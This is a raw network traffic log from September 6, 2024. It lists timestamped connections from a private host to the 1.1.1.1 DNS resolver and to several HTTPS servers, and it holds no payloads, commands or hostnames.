Sep 6, 2024 09:58:24.360955954 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.371644020 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.373552084 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.384020090 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.758903027 CEST	52905	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:24.765659094 CEST	53	52905	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:24.770030022 CEST	56631	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:24.777399063 CEST	53	56631	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:25.331348896 CEST	62164	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:25.342679977 CEST	49549	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:25.349710941 CEST	53	49549	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:25.358088017 CEST	54667	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:25.364872932 CEST	53	54667	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:26.492047071 CEST	55495	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:26.497471094 CEST	50393	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:26.498471022 CEST	54393	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:26.498884916 CEST	53	55495	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:26.504214048 CEST	53	50393	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:30.662817955 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:30.664068937 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.045512915 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.135726929 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:31.135745049 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:31.136470079 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.136558056 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.136858940 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.136858940 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.143345118 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:31.143666029 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.234031916 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:31.235631943 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:31.235728025 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:31.236648083 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.236677885 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.241431952 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:31.277049065 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:31.277152061 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:31.284089088 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.315311909 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:31.407444954 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:48.877331018 CEST	138	138	192.168.2.7	192.168.2.255
Sep 6, 2024 09:58:49.961321115 CEST	57892	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:49.968430996 CEST	53	57892	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:49.971113920 CEST	61417	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:49.973138094 CEST	60555	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:49.978082895 CEST	53	61417	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:49.978657007 CEST	56926	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:49.981179953 CEST	53	60555	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:49.981812954 CEST	64836	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:49.986437082 CEST	53	56926	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:49.990322113 CEST	53	64836	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:50.684922934 CEST	53856	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:50.692536116 CEST	53	53856	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:50.694592953 CEST	54600	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:50.701841116 CEST	53	54600	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:50.702563047 CEST	59422	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:50.704821110 CEST	61151	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:50.709443092 CEST	53	59422	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:51.740192890 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:51.853452921 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:51.853471994 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:51.857615948 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:51.897895098 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:51.937144995 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:51.980791092 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:52.050856113 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:52.050935030 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:52.051208019 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:52.085372925 CEST	55984	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:52.173927069 CEST	443	55984	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:53.622076035 CEST	64327	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:53.628808975 CEST	53	64327	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:53.644996881 CEST	56793	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:53.651870012 CEST	53	56793	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:53.660897970 CEST	59691	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:53.668669939 CEST	53	59691	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:53.729526997 CEST	56491	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:53.736598015 CEST	53	56491	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:53.738032103 CEST	50221	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:53.745074987 CEST	53	50221	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:53.767080069 CEST	51252	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:53.774125099 CEST	53	51252	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:54.099096060 CEST	54047	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:54.105912924 CEST	53	54047	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:54.107784033 CEST	52746	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:54.114643097 CEST	53	52746	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:54.115236998 CEST	61314	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:54.122700930 CEST	53	61314	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:54.200851917 CEST	53859	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:54.242518902 CEST	53	54199	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:54.917732000 CEST	49693	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:54.924559116 CEST	53	49693	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:54.959681034 CEST	55715	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:54.966888905 CEST	53	55715	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:54.982652903 CEST	60331	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:54.989630938 CEST	53	60331	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:57.484963894 CEST	53390	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:57.492549896 CEST	53	53390	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:57.498914003 CEST	60209	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:57.505641937 CEST	53	60209	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:57.506251097 CEST	60437	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:57.513186932 CEST	53	60437	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:58.704669952 CEST	59334	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:58.711654902 CEST	53	59334	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:58.712394953 CEST	65165	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:58.720340967 CEST	53	65165	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:58.720915079 CEST	51642	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:58.728946924 CEST	53	51642	1.1.1.1	192.168.2.7
Sep 6, 2024 09:59:02.093358040 CEST	53037	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:59:02.100601912 CEST	53	53037	1.1.1.1	192.168.2.7
Sep 6, 2024 09:59:16.080590010 CEST	52749	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:59:16.296129942 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:16.297806978 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:16.297976971 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:16.298051119 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:16.320367098 CEST	53	52749	1.1.1.1	192.168.2.7
Sep 6, 2024 09:59:16.630619049 CEST	57005	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:59:16.639817953 CEST	53	57005	1.1.1.1	192.168.2.7
Sep 6, 2024 09:59:16.653304100 CEST	60323	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:59:16.657592058 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:16.660427094 CEST	53	60323	1.1.1.1	192.168.2.7
Sep 6, 2024 09:59:16.757870913 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:16.757931948 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:16.757937908 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:16.757941961 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:16.757946968 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:16.758893013 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:16.759047031 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:16.759093046 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:16.759136915 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:16.855098009 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:16.855724096 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:16.951932907 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:16.951950073 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:16.952223063 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:16.952919006 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:18.137765884 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:18.137881041 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:18.236804008 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:18.237060070 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:18.238729954 CEST	443	50119	172.64.41.3	192.168.2.7
Sep 6, 2024 09:59:18.238945961 CEST	50119	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:59:18.240391970 CEST	51024	443	192.168.2.7	23.44.201.4
Sep 6, 2024 09:59:18.559592962 CEST	51024	443	192.168.2.7	23.44.201.4
Sep 6, 2024 09:59:18.696770906 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:18.716475010 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:18.716491938 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:18.716500998 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:18.716507912 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:18.717112064 CEST	51024	443	192.168.2.7	23.44.201.4
Sep 6, 2024 09:59:18.719044924 CEST	51024	443	192.168.2.7	23.44.201.4
Sep 6, 2024 09:59:18.719166994 CEST	51024	443	192.168.2.7	23.44.201.4
Sep 6, 2024 09:59:18.814668894 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:18.814677000 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:18.814788103 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:18.814791918 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:18.815071106 CEST	51024	443	192.168.2.7	23.44.201.4
Sep 6, 2024 09:59:18.815176964 CEST	51024	443	192.168.2.7	23.44.201.4
Sep 6, 2024 09:59:18.929387093 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:21.976119995 CEST	54782	443	192.168.2.7	142.251.163.84
Sep 6, 2024 09:59:21.977400064 CEST	54782	443	192.168.2.7	142.251.163.84
Sep 6, 2024 09:59:22.442285061 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:22.442771912 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:22.442842960 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:22.442856073 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:22.442867994 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:22.443226099 CEST	54782	443	192.168.2.7	142.251.163.84
Sep 6, 2024 09:59:22.443794966 CEST	54782	443	192.168.2.7	142.251.163.84
Sep 6, 2024 09:59:22.545051098 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:22.545064926 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:22.545557022 CEST	54782	443	192.168.2.7	142.251.163.84
Sep 6, 2024 09:59:22.569793940 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:23.683408976 CEST	54782	443	192.168.2.7	142.251.163.84
Sep 6, 2024 09:59:24.154829979 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:24.154922962 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:24.154933929 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:24.154942036 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:24.155477047 CEST	54782	443	192.168.2.7	142.251.163.84
Sep 6, 2024 09:59:24.155565023 CEST	54782	443	192.168.2.7	142.251.163.84
Sep 6, 2024 09:59:24.155750036 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:24.156416893 CEST	54782	443	192.168.2.7	142.251.163.84
Sep 6, 2024 09:59:24.282001972 CEST	443	54782	142.251.163.84	192.168.2.7
Sep 6, 2024 09:59:37.118536949 CEST	60616	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:59:37.125349045 CEST	53	60616	1.1.1.1	192.168.2.7
Sep 6, 2024 09:59:37.602715015 CEST	65335	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:59:37.880052090 CEST	53	60196	1.1.1.1	192.168.2.7
Sep 6, 2024 09:59:38.813890934 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:38.849451065 CEST	51024	443	192.168.2.7	23.44.201.4
Sep 6, 2024 09:59:39.313601017 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 09:59:39.350105047 CEST	51024	443	192.168.2.7	23.44.201.4
Sep 6, 2024 09:59:48.870328903 CEST	443	51024	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:01.118455887 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:01.119798899 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:01.119798899 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:01.120014906 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:01.539444923 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:01.682158947 CEST	443	54878	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:01.682172060 CEST	443	54878	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:01.682192087 CEST	443	54878	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:01.682204008 CEST	443	54878	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:01.682208061 CEST	443	54878	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:01.691307068 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:01.691391945 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:01.691458941 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:01.691545963 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:01.792301893 CEST	443	54878	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:01.792871952 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:01.892826080 CEST	443	54878	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:01.894515991 CEST	443	54878	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:01.894550085 CEST	443	54878	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:01.895097017 CEST	54878	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:17.614192963 CEST	54847	53	192.168.2.7	1.1.1.1
Sep 6, 2024 10:00:17.620980024 CEST	53	54847	1.1.1.1	192.168.2.7
Sep 6, 2024 10:00:17.622056961 CEST	57438	53	192.168.2.7	1.1.1.1
Sep 6, 2024 10:00:17.628861904 CEST	53	57438	1.1.1.1	192.168.2.7
Sep 6, 2024 10:00:18.109699965 CEST	58301	53	192.168.2.7	1.1.1.1
Sep 6, 2024 10:00:18.191575050 CEST	62923	443	192.168.2.7	23.44.201.4
Sep 6, 2024 10:00:18.650846004 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:18.651055098 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:18.651772022 CEST	62923	443	192.168.2.7	23.44.201.4
Sep 6, 2024 10:00:18.748800039 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:18.749247074 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:18.749258041 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:18.750787973 CEST	62923	443	192.168.2.7	23.44.201.4
Sep 6, 2024 10:00:18.793752909 CEST	62923	443	192.168.2.7	23.44.201.4
Sep 6, 2024 10:00:18.864033937 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:22.025535107 CEST	61797	53	192.168.2.7	1.1.1.1
Sep 6, 2024 10:00:22.025665045 CEST	53445	53	192.168.2.7	1.1.1.1
Sep 6, 2024 10:00:22.032687902 CEST	53	61797	1.1.1.1	192.168.2.7
Sep 6, 2024 10:00:22.032964945 CEST	53	53445	1.1.1.1	192.168.2.7
Sep 6, 2024 10:00:22.033919096 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.034041882 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.034260035 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.034348011 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.346908092 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.502712965 CEST	443	51637	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:22.502732038 CEST	443	51637	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:22.502743959 CEST	443	51637	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:22.502753019 CEST	443	51637	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:22.502762079 CEST	443	51637	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:22.503420115 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.503572941 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.503643036 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.503643036 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.599333048 CEST	443	51637	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:22.599343061 CEST	443	51637	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:22.600055933 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.697395086 CEST	443	51637	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:22.698067904 CEST	443	51637	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:22.698080063 CEST	443	51637	172.64.41.3	192.168.2.7
Sep 6, 2024 10:00:22.699970961 CEST	51637	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:00:22.699974060 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:22.700269938 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:23.156281948 CEST	443	62726	172.253.62.84	192.168.2.7
Sep 6, 2024 10:00:23.156338930 CEST	443	62726	172.253.62.84	192.168.2.7
Sep 6, 2024 10:00:23.156349897 CEST	443	62726	172.253.62.84	192.168.2.7
Sep 6, 2024 10:00:23.157299995 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:23.157299995 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:23.180546999 CEST	443	62726	172.253.62.84	192.168.2.7
Sep 6, 2024 10:00:23.193535089 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:23.256580114 CEST	443	62726	172.253.62.84	192.168.2.7
Sep 6, 2024 10:00:23.295094967 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:23.702305079 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:23.802022934 CEST	443	62726	172.253.62.84	192.168.2.7
Sep 6, 2024 10:00:23.837178946 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:23.869400978 CEST	443	62726	172.253.62.84	192.168.2.7
Sep 6, 2024 10:00:23.869415045 CEST	443	62726	172.253.62.84	192.168.2.7
Sep 6, 2024 10:00:23.869426012 CEST	443	62726	172.253.62.84	192.168.2.7
Sep 6, 2024 10:00:23.871144056 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:23.871285915 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:23.923460960 CEST	62726	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:00:23.995789051 CEST	443	62726	172.253.62.84	192.168.2.7
Sep 6, 2024 10:00:39.253365040 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:39.254503012 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:39.256628036 CEST	62923	443	192.168.2.7	23.44.201.4
Sep 6, 2024 10:00:39.316292048 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:39.316308975 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:00:39.316703081 CEST	62923	443	192.168.2.7	23.44.201.4
Sep 6, 2024 10:00:39.316772938 CEST	62923	443	192.168.2.7	23.44.201.4
Sep 6, 2024 10:00:48.747524977 CEST	443	62923	23.44.201.4	192.168.2.7
Sep 6, 2024 10:01:16.249629974 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.249763012 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.249969006 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.250056028 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.685729027 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.727948904 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:16.728713036 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.766072989 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.781954050 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:16.781966925 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:16.781975031 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:16.781984091 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:16.782470942 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.782545090 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.824441910 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:16.866756916 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.878505945 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:16.878896952 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:16.975931883 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:16.977102041 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:16.977111101 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:16.977436066 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:18.995187044 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:18.995290041 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:19.091825962 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:19.092370987 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:19.092524052 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:19.093480110 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:19.752974033 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:19.752974033 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:19.849698067 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:19.850893021 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:19.862040043 CEST	443	60095	172.64.41.3	192.168.2.7
Sep 6, 2024 10:01:19.862286091 CEST	60095	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:01:20.948328018 CEST	61035	53	192.168.2.7	1.1.1.1
Sep 6, 2024 10:01:20.955063105 CEST	53	61035	1.1.1.1	192.168.2.7
Sep 6, 2024 10:01:21.446661949 CEST	58647	53	192.168.2.7	1.1.1.1
Sep 6, 2024 10:01:22.076639891 CEST	57333	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:01:22.076855898 CEST	57333	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:01:22.526403904 CEST	443	57333	172.253.62.84	192.168.2.7
Sep 6, 2024 10:01:22.526418924 CEST	443	57333	172.253.62.84	192.168.2.7
Sep 6, 2024 10:01:22.526434898 CEST	443	57333	172.253.62.84	192.168.2.7
Sep 6, 2024 10:01:22.527033091 CEST	57333	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:01:22.527101994 CEST	57333	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:01:22.550201893 CEST	443	57333	172.253.62.84	192.168.2.7
Sep 6, 2024 10:01:22.564569950 CEST	57333	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:01:22.626477003 CEST	443	57333	172.253.62.84	192.168.2.7
Sep 6, 2024 10:01:22.665393114 CEST	57333	443	192.168.2.7	172.253.62.84
Sep 6, 2024 10:01:40.631166935 CEST	53909	53	192.168.2.7	1.1.1.1
Sep 6, 2024 10:01:40.641267061 CEST	53	53909	1.1.1.1	192.168.2.7
Sep 6, 2024 10:01:40.642987013 CEST	59214	53	192.168.2.7	1.1.1.1
Sep 6, 2024 10:01:40.649930954 CEST	53	59214	1.1.1.1	192.168.2.7
Sep 6, 2024 10:01:40.650474072 CEST	55754	53	192.168.2.7	1.1.1.1
